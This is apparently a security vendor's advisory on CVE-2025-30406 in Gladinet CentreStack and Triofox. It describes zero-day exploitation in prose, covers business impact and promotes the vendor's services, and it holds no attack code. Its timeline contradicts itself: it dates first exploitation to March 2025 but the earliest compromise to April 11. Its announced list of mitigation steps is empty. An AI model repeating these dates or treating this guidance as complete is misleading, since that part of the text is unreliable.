A critical security vulnerability has been identified in Gladinet CentreStack and its Triofox remote access solution, tracked as CVE-2025-30406 with a CVSS score of 9.0. This flaw involves the use of a hard-coded cryptographic key, which could allow attackers to execute remote code on internet-accessible servers. The vulnerability has already been exploited as a zero-day, affecting at least seven organizations. It is crucial for users to update to CentreStack version 16.4.10315.56368 or later to mitigate this risk.
The vulnerability was first exploited in March 2025, with the earliest known compromise occurring on April 11, 2025. Attackers have been using this flaw to download and sideload malicious DLLs via encoded PowerShell scripts, a technique similar to recent attacks on CrushFTP. This has enabled them to conduct lateral movements within networks and install MeshCentral for persistent remote access.
Telemetry data indicates that the CentreStack software is installed on approximately 120 endpoints, with seven unique organizations confirmed as compromised. The attackers have been observed using Impacket PowerShell commands for network enumeration and deploying MeshAgent, although the full scope and objectives of these campaigns remain unclear.
The primary threat involves a hard-coded cryptographic key in Gladinet CentreStack and Triofox, which can be exploited for remote code execution. This vulnerability, CVE-2025-30406, poses a significant risk due to its high CVSS score of 9.0. Attackers can leverage this flaw to gain unauthorized access to systems, potentially leading to data breaches or further network infiltration.
Exploitation of this vulnerability has been observed in the wild, with attackers using encoded PowerShell scripts to sideload DLLs and establish remote access through MeshCentral. This method allows for stealthy lateral movement within affected networks, increasing the potential impact on compromised organizations.
Industries relying on remote access and collaboration tools are particularly at risk, as the vulnerability affects both CentreStack and Triofox solutions. Organizations using these products should prioritize updates to prevent potential exploitation and mitigate associated risks.
Clients using Gladinet CentreStack or Triofox may face operational disruptions due to unauthorized access and potential data breaches. The exploitation of this vulnerability could lead to significant financial losses, especially if sensitive data is compromised or systems are rendered inoperable.
Reputation damage is another concern, as clients may lose trust in organizations that fail to secure their systems against known vulnerabilities. Additionally, regulatory compliance issues could arise if data protection laws are violated due to unauthorized access or data breaches.
Compliance Implications: Organizations must ensure they adhere to relevant data protection regulations by promptly addressing this vulnerability. Failure to do so could result in audits, penalties, or legal action if client data is compromised.
To mitigate the risks associated with CVE-2025-30406, clients should take the following actions:
1898 & Co is actively addressing the current threat landscape by offering specialized services designed to mitigate emerging threats like CVE-2025-30406. Our team provides tailored security assessments and incident response services to help clients identify vulnerabilities and respond effectively to potential breaches.
We have updated our security protocols to incorporate the latest threat intelligence and best practices for protecting against remote code execution vulnerabilities. Our collaborative efforts with industry allies and government agencies ensure that we remain at the forefront of cybersecurity developments.
Ongoing research and threat intelligence gathering activities enable us to provide clients with timely insights into evolving threats. Our case studies demonstrate successful mitigations of similar vulnerabilities, showcasing our ability to support clients in enhancing their security measures.